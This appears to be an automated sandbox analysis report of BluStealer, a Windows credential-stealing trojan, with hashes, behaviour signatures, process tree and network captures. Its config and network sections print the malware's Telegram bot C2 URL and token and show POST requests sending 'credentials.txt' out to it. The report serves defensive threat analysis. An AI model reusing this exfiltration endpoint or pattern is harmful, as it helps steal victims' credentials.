Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2022 05:31

General

  • Target

    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe

  • Size

    1.2MB

  • MD5

    7f7ef456450f254a7bbb162af495a3d2

  • SHA1

    b957c8cc73f9cc83cf1519a628b2f8382d52befc

  • SHA256

    02a4055e2fce4b14d2a07f2625c2329309c01dea5499294405ca78e1d800bd78

  • SHA512

    a481c5de7cf000d30f6a28d4f8d6712295d6de062f64722ff264b423ae37d55dafba35676d63ed4ee68e465c1ce39082e4e48ad960f31a072d6c77f94bd731c6

  • SSDEEP

    24576:wM+L74mBfNUstzoh04C14jT7cIxSFD075acQrFclsFVTJWR22n8W5enV3mmb3r8n:f+ejTBC05lQrF6sFVTJkj8W5enV3mOI

Malware Config

Extracted

Family

blustealer

C2

https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage?chat_id=1251788325

Signatures

  • BluStealer

    A Modular information stealer written in Visual Basic.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3076
    • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
      "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4108
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        3⤵
        • Accesses Microsoft Outlook profiles
        • outlook_office_path
        • outlook_win_path
        PID:952

Network

  • flag-unknown
    DNS
    151.122.125.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    151.122.125.40.in-addr.arpa
    IN PTR
    Response
  • flag-unknown
    DNS
    api.telegram.org
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-unknown
    POST
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Content-Length: 167
    Host: api.telegram.org
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 22 Nov 2022 05:32:17 GMT
    Content-Type: application/json
    Content-Length: 404
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-unknown
    POST
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 201
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Tue, 22 Nov 2022 05:32:48 GMT
    Content-Type: application/json
    Content-Length: 81
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-unknown
    DNS
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    IN PTR
    Response
  • flag-unknown
    DNS
    crl.godaddy.com
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    8.8.8.8:53
    Request
    crl.godaddy.com
    IN A
    Response
    crl.godaddy.com
    IN CNAME
    gdcrl.godaddy.com.akadns.net
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.36
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.41
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.31
  • flag-unknown
    GET
    http://crl.godaddy.com/gdroot.crl
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    192.124.249.31:80
    Request
    GET /gdroot.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: crl.godaddy.com
    Response
    HTTP/1.1 200 OK
    Server: Sucuri/Cloudproxy
    Date: Tue, 22 Nov 2022 05:33:15 GMT
    Content-Type: application/x-pkcs7-crl
    Content-Length: 429
    Connection: keep-alive
    X-Sucuri-ID: 19031
    Last-Modified: Mon, 27 Jun 2022 22:00:33 GMT
    ETag: "1ad-5e2750c919e0b"
    Cache-Control: public, no-transform, must-revalidate
    Expires: Wed, 29 Jun 2022 08:23:08 GMT
    P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
    X-Sucuri-Cache: HIT
    Accept-Ranges: bytes
  • flag-unknown
    GET
    http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    192.124.249.41:80
    Request
    GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: ocsp.godaddy.com
    Response
    HTTP/1.1 200 OK
    Server: Sucuri/Cloudproxy
    Date: Tue, 22 Nov 2022 05:33:21 GMT
    Content-Type: application/ocsp-response
    Content-Length: 1697
    Connection: keep-alive
    X-Sucuri-ID: 19041
    Content-Transfer-Encoding: Binary
    Cache-Control: public, no-transform, must-revalidate
    Last-Modified: Mon, 21 Nov 2022 20:10:13 GMT
    Expires: Tue, 22 Nov 2022 20:10:13 GMT
    ETag: "18a2bef6d3bd326990faa7d41a031ae2978128cb"
    P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
    X-Sucuri-Cache: HIT
  • 8.238.24.126:80
    322 B
    7
  • 8.238.24.126:80
    322 B
    7
  • 8.238.24.126:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 20.42.65.85:443
    322 B
    7
  • 87.248.202.1:80
    322 B
    7
  • 87.248.202.1:80
    322 B
    7
  • 87.248.202.1:80
    322 B
    7
  • 149.154.167.220:443
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
    tls, http
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    1.3kB
    7.1kB
    11
    11

    HTTP Request

    POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin
    tls, http
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    1.7kB
    6.7kB
    14
    11

    HTTP Request

    POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin

    HTTP Response

    400
  • 192.124.249.36:80
    crl.godaddy.com
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    260 B
    5
  • 192.124.249.36:80
    crl.godaddy.com
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    260 B
    5
  • 192.124.249.41:80
    crl.godaddy.com
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    260 B
    5
  • 192.124.249.31:80
    http://crl.godaddy.com/gdroot.crl
    http
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    310 B
    1.1kB
    4
    3

    HTTP Request

    GET http://crl.godaddy.com/gdroot.crl

    HTTP Response

    200
  • 192.124.249.41:80
    http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
    http
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    404 B
    2.4kB
    4
    4

    HTTP Request

    GET http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D

    HTTP Response

    200
  • 8.8.8.8:53
    151.122.125.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    151.122.125.40.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    dns
    118 B
    204 B
    1
    1

    DNS Request

    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa

  • 8.8.8.8:53
    crl.godaddy.com
    dns
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    61 B
    151 B
    1
    1

    DNS Request

    crl.godaddy.com

    DNS Response

    192.124.249.36
    192.124.249.41
    192.124.249.31

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/952-145-0x0000000000E10000-0x0000000000E76000-memory.dmp

    Filesize

    408KB

  • memory/3076-132-0x0000000000120000-0x000000000024E000-memory.dmp

    Filesize

    1.2MB

  • memory/3076-133-0x00000000052D0000-0x0000000005874000-memory.dmp

    Filesize

    5.6MB

  • memory/3076-134-0x0000000004D20000-0x0000000004DB2000-memory.dmp

    Filesize

    584KB

  • memory/3076-135-0x0000000004CF0000-0x0000000004CFA000-memory.dmp

    Filesize

    40KB

  • memory/3076-136-0x0000000007460000-0x00000000074FC000-memory.dmp

    Filesize

    624KB

  • memory/4108-138-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/4108-140-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/4108-143-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/4108-146-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.